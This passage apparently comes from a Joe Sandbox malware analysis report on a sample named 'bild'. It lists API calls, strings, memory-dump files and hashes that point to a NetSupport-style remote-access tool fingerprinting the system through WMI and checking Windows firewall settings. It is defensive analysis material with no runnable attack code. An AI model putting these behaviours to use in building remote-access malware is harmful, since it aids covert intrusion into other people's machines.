                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                                                          • String ID: Advapi32.dll$Wtsapi32.dll
                                                                                          • API String ID: 2851125068-2390547818
                                                                                          • Opcode ID: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                          • Instruction ID: 20da51148d2406ef940ba90f631bbe284ff6dbb95dc7cb8c25b5cdc78ae8e1aa
                                                                                          • Opcode Fuzzy Hash: aaba10e307cec69a1f7ff7a57bac704082b679f648b946fc7c8140d35e3eefa9
                                                                                          • Instruction Fuzzy Hash: 2A4115B4D09B449FC761CF6A8940BDAFBE8EFA9604F00490EE5AE93210D7797500CF56
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 1101733C
                                                                                          • CoInitialize.OLE32(00000000), ref: 11017345
                                                                                          • _GetRawWMIStringW@16.PCICL32(Win32_ComputerSystem,00000001,?,?), ref: 1101736C
                                                                                          • CoUninitialize.COMBASE ref: 110173D0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                          • String ID: PCSystemTypeEx$Win32_ComputerSystem
                                                                                          • API String ID: 2407233060-578995875
                                                                                          • Opcode ID: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                          • Instruction ID: df925c951649f52390f194a40c23bf9fa59b5f59fb7a44760539d7ccd5920114
                                                                                          • Opcode Fuzzy Hash: 3ab08bcf13d713d750a6400e0dd08c6ca0ab4b874316cbd8a5b8b2923fc85cec
                                                                                          • Instruction Fuzzy Hash: 7F2137B5E041259BDB11DFA0CC46BBAB6E8AF40308F0040B9EC69DB184FA79E940D7A1
                                                                                          APIs
                                                                                          • WaitForSingleObject.KERNEL32(00000318,000000FF), ref: 11017252
                                                                                          • CoInitialize.OLE32(00000000), ref: 1101725B
                                                                                          • _GetRawWMIStringW@16.PCICL32(Win32_SystemEnclosure,00000001,?,?), ref: 11017282
                                                                                          • CoUninitialize.COMBASE ref: 110172E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: InitializeObjectSingleStringUninitializeW@16Wait
                                                                                          • String ID: ChassisTypes$Win32_SystemEnclosure
                                                                                          • API String ID: 2407233060-2037925671
                                                                                          • Opcode ID: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                          • Instruction ID: c2f3c346b695d23426c96ecc328f7bdb1aeadc280033f44fb53199f8ba8604cb
                                                                                          • Opcode Fuzzy Hash: 03f14ebb68a291b498bc3e28f26753d57b14005c3c93e514e963537cc8d20d91
                                                                                          • Instruction Fuzzy Hash: 19210575E016299BD712DFE0CC45BEEB7E89F80718F0001A8FC29DB184EA7AE945C761
                                                                                          APIs
                                                                                          Strings
                                                                                          • AutoICFConfig, xrefs: 11138700
                                                                                          • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1113879C
                                                                                          • DoICFConfig() OK, xrefs: 11138786
                                                                                          • Client, xrefs: 11138705
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CountTick
                                                                                          • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                                                          • API String ID: 536389180-1512301160
                                                                                          • Opcode ID: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                          • Instruction ID: a0019f70d98f4d819e239f855ef0bc8db2e19db1671bc02c3e0d3b7677daedde
                                                                                          • Opcode Fuzzy Hash: a952649d10152439879ed58b5e1132f0d59133535c4a4a3642475d19345c2f1e
                                                                                          • Instruction Fuzzy Hash: E4210578A247AB4AFB039B759ED4755FB83578073EF450278DE10862CCDB74A458CB42
                                                                                          APIs
                                                                                          • send.WSOCK32(?,?,?,00000000), ref: 6C5D9C93
                                                                                          • timeGetTime.WINMM(?,?,?,00000000), ref: 6C5D9CD0
                                                                                          • Sleep.KERNEL32(00000000), ref: 6C5D9CDE
                                                                                          • LeaveCriticalSection.KERNEL32(?), ref: 6C5D9D4F
                                                                                          • InterlockedIncrement.KERNEL32(?), ref: 6C5D9D72
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3900030829.000000006C5D1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3900014293.000000006C5D0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900075671.000000006C619000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61A000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900091633.000000006C61E000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3900123306.000000006C620000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_6c5d0000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalIncrementInterlockedLeaveSectionSleepTimesendtime
                                                                                          • String ID: 3'
                                                                                          • API String ID: 77915721-280543908
                                                                                          • Opcode ID: 4d991a7fd4910dd5e63054c69c344b3b143660256b87d5feb900cda10d859242
                                                                                          • Instruction ID: e4615c7a9f2bfe3b499a5afee83e88e60d15619c19cca24c9eeb59424fce252b
                                                                                          • Opcode Fuzzy Hash: 4d991a7fd4910dd5e63054c69c344b3b143660256b87d5feb900cda10d859242
                                                                                          • Instruction Fuzzy Hash: 4D21CD70A042188FDB20DF68DC98B9AB3B4AF45325F164295D80E9B681CA30ED84CF95
                                                                                          APIs
                                                                                          • CoInitialize.OLE32(00000000), ref: 11096984
                                                                                          • CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,1113769B), ref: 1109699E
                                                                                          • CoCreateInstance.OLE32(?,00000000,00000001,111C08AC,?,?,?,?,?,?,?,1113769B), ref: 110969BB
                                                                                          • CoUninitialize.OLE32(?,?,?,?,?,?,1113769B), ref: 110969D9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateFromInitializeInstanceProgUninitialize
                                                                                          • String ID: HNetCfg.FwMgr$ICF Present:
                                                                                          • API String ID: 3222248624-258972079
                                                                                          • Opcode ID: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                          • Instruction ID: ffe5b7852bae71a5603cb4f529131e3535c43cf5cc9a129c5e7f13935f1cb029
                                                                                          • Opcode Fuzzy Hash: f34227f50c1ea86a65abb9f5b461b7bcbc9d9ad9ed009c44ac4fae2586091261
                                                                                          • Instruction Fuzzy Hash: 9C11AC74E0012DABC700EAE5DC95AEFBB68AF45709F100029F50AEB144EA21EA40C7E2
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11025D16
                                                                                          • K32GetProcessImageFileNameA.KERNEL32(?,?,?,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D32
                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11025D46
                                                                                          • SetLastError.KERNEL32(00000078,1110720F,00000000,00000000,?,11106527,00000000,?,00000104), ref: 11025D69
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                                                          • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                                                          • API String ID: 4186647306-532032230
                                                                                          • Opcode ID: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                          • Instruction ID: 74662284ed99b9a54ad109221a671fe8fcdc3fa540ca7c31caa090441a4958f5
                                                                                          • Opcode Fuzzy Hash: fbb342385a7ca70d12a15f9985bda82124cf97ba9cccb812bf362dda13377f65
                                                                                          • Instruction Fuzzy Hash: 98016D72601718ABE330DEA5EC48F87B7E8EB88765F10052AF95697200D631E8018BA4
                                                                                          APIs
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,00000000,76EDC3F0,00000000,?,11110245,1110FDE0,00000001,00000000), ref: 1110F2C7
                                                                                          • CreateThread.KERNEL32(00000000,11110245,00000001,00000000,00000000,0000000C), ref: 1110F2EA
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F317
                                                                                          • CloseHandle.KERNEL32(?,?,11110245,1110FDE0,00000001,00000000,?,?,?,?,?,11031040), ref: 1110F321
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                          • String ID: ..\ctl32\Refcount.cpp$hThread
                                                                                          • API String ID: 3360349984-1136101629
                                                                                          • Opcode ID: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                          • Instruction ID: 7cf91fcea6c2a3c5c2684f5d08a561b662f4dc7f01f0c277a0d6c7245401f800
                                                                                          • Opcode Fuzzy Hash: c9018d34e74e4049c7ebca087304ef1218ab8024f9415a3366a00b8023e95b9a
                                                                                          • Instruction Fuzzy Hash: E7015E7A7443166FE3209EA9CC86F57FBA8DB44764F104128FA25962C4DA60F805CB64
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: %s%s%s.bin$506407$_HF$_HW$_SW
                                                                                          • API String ID: 2111968516-529817155
                                                                                          • Opcode ID: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                          • Instruction ID: 34a826dfca0d5743c415d593f242b0f3cefc790b54bbadf5113738552eb06063
                                                                                          • Opcode Fuzzy Hash: b97882e65002706a22fb778f12bbc90950e65c749b3e8462a2311051e46cf205
                                                                                          • Instruction Fuzzy Hash: 93E092A1D1870C6FF70085589C15F9EFAE87B4978EFC48051BEEDA7292E935D60082D6
                                                                                          APIs
                                                                                          • GlobalAddAtomA.KERNEL32(NSMDesktopWnd), ref: 11102B03
                                                                                          • GetStockObject.GDI32(00000004), ref: 11102B5B
                                                                                          • RegisterClassA.USER32(?), ref: 11102B6F
                                                                                          • CreateWindowExA.USER32(00000000,NSMDesktopWnd,?,00000000,00000000,00000000,00000000,00000000,00130000,00000000,11000000,00000000), ref: 11102BAC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AtomClassCreateGlobalObjectRegisterStockWindow
                                                                                          • String ID: NSMDesktopWnd
                                                                                          • API String ID: 2669163067-206650970
                                                                                          • Opcode ID: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                          • Instruction ID: 4c07b853b75387a4d851a66abc04609236edd6d81c14be1d28904dd9f6a0e6ac
                                                                                          • Opcode Fuzzy Hash: e27069a72c11c1f4eb1c56e7938a9b61728f0754eae0ec1cd31abd721b9bda48
                                                                                          • Instruction Fuzzy Hash: C231F4B0D15619AFDB44CFA9D980A9EFBF4FB08314F50962EE46AE3640E7346900CF94
                                                                                          APIs
                                                                                          • KillTimer.USER32(00000000,00000000,TermUI...), ref: 1113CC9A
                                                                                          • KillTimer.USER32(00000000,00007F70,TermUI...), ref: 1113CCB3
                                                                                          • FreeLibrary.KERNEL32(76A50000,?,TermUI...), ref: 1113CD2B
                                                                                          • FreeLibrary.KERNEL32(00000000,?,TermUI...), ref: 1113CD43
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_6_2_11000000_bild.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeKillLibraryTimer
                                                                                          • String ID: TermUI
                                                                                          • API String ID: 2006562601-4085834059
                                                                                          • Opcode ID: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                          • Instruction ID: 1c615ec055e307fcecd6c2f5a0081f3099d40e524c959ad3afbad8c7da76a6da
                                                                                          • Opcode Fuzzy Hash: 0b8b98d89ae2f905afc74c8ae1c01cea1ae783866c2b84ef9f483cfa62b8061f
                                                                                          • Instruction Fuzzy Hash: 813182B46121329FE605DF9ACDE496EFB6ABBC4B1C750402BF4689720CE770A845CF91
                                                                                          APIs
                                                                                          • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111453A0
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 11145404
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000006.00000002.3899647877.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                          • Associated: 00000006.00000002.3899633087.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899777692.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899796298.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                          • Associated: 00000006.00000002.3899812709.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
